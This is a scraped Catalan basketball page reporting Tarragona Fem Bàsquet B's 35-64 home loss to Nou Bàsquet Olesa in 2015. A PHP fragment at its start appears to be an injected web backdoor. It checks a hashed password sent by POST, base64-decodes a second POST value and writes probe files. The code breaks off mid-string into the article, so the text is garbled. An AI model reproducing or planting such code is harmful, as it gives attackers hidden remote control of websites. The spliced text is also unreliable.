function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El Tarragona Fem Bàsquet B no aixeca el cap i perd contra el Nou Bàsquet Olesa (35-64) - Tgn Bàsquet Club -

El Tarragona Fem Bàsquet B no aixeca el cap i perd contra el Nou Bàsquet Olesa (35-64)

Updated: octubre 31, 2015

En un bucle. El Tarragona Fem Bàsquet B no pot escapar del seu destí en aquest inici de temporada. La lluita, la fe, les ganes i la voluntat de guanyar no són suficients contra un curs que està sent especialment cruel amb les noies de Sergi Farré. Aquest vespre, el botxí ha estat el Nou Bàsquet Olesa. El conjunt visitant en va tenir prou controlant el rebot i aprofitant la punteria de les seves exteriors en la segona meitat -en especial Afonso, 3 triples a l’últim període- per guanyar amb facilitat l’equip lila, que va anar perdent força a mesura que passaven els minuts. L’estat anímic no ajuda i quan els tirs còmodes no entren i s’ha de defensar i defensar per recuperar darrere allò que no es guanya al davant, la ment s’esgota. En aquest procès de cansament psíquic el Nou Bàsquet Olesa va trobar petroli i pel botí que s’en va endur, semblava un membre de l’OPEP.

Els primers vint minuts van ser esperançadors per les locals. Tot i el domini del Nou Bàsquet Olesa, les diferències eren curtes i planava una sensació que, amb una bona dosi de treball i esforç, el partit es podria guanyar. Així, el Tarragona Fem Bàsquet B va donar un pas endavant i va recuperar diferències, passant del 5-12 al 16-17 en 5 minuts. Amb tot, el domini en el joc interior de les visitants, que van aprofitar la baixa de Pocino per lesió, va ser cabdal i van gaudir de moltes situacions de segones opcions de tir. El Tarragona Fem Bàsquet B, que va recuperar moltes pilotes, va desaprofitar les transicions ofensives, amb clares situacions de 3 contra 1 fins i tot (19-25 al descans).

A partir del tercer quart tot es va ensorrar. El Tarragona Fem Bàsquet B no va trobar el camí al cèrcol rival i això ho va aprofitar el Nou Bàsquet Olesa per obrir forat (26-37 a, minut 26). En la primera meitat, Anna Garcia i Irene Villegas havien estat molt inspirades (tres triples) però en aquests segons vint minuts els tirs de tot l’equip van tocar ferro una i altra vegada. Sense encert, va arribar el desànim (28-39, tercer quart).

L’últim període va ser per oblidar. El Nou Bàsquet Olesa va veure les liles en dificultats i no va tenir pietat. Un bombardeig de triples va perforar la defensa local que no arribava a temps a puntejar. Les pilotes perdudes sovintejaven i els últims minuts van ser un reguitzell d’errades del Tarragona Fem Bàsquet B i cistelles fàcils de les visitants (28-47 a 5:36 del final). Els últims quatre minuts es van fer llarguíssims per les locals, conscients que la remuntada era impossible i el balanç de l’equip és de 0 victòries i 6 derrotes.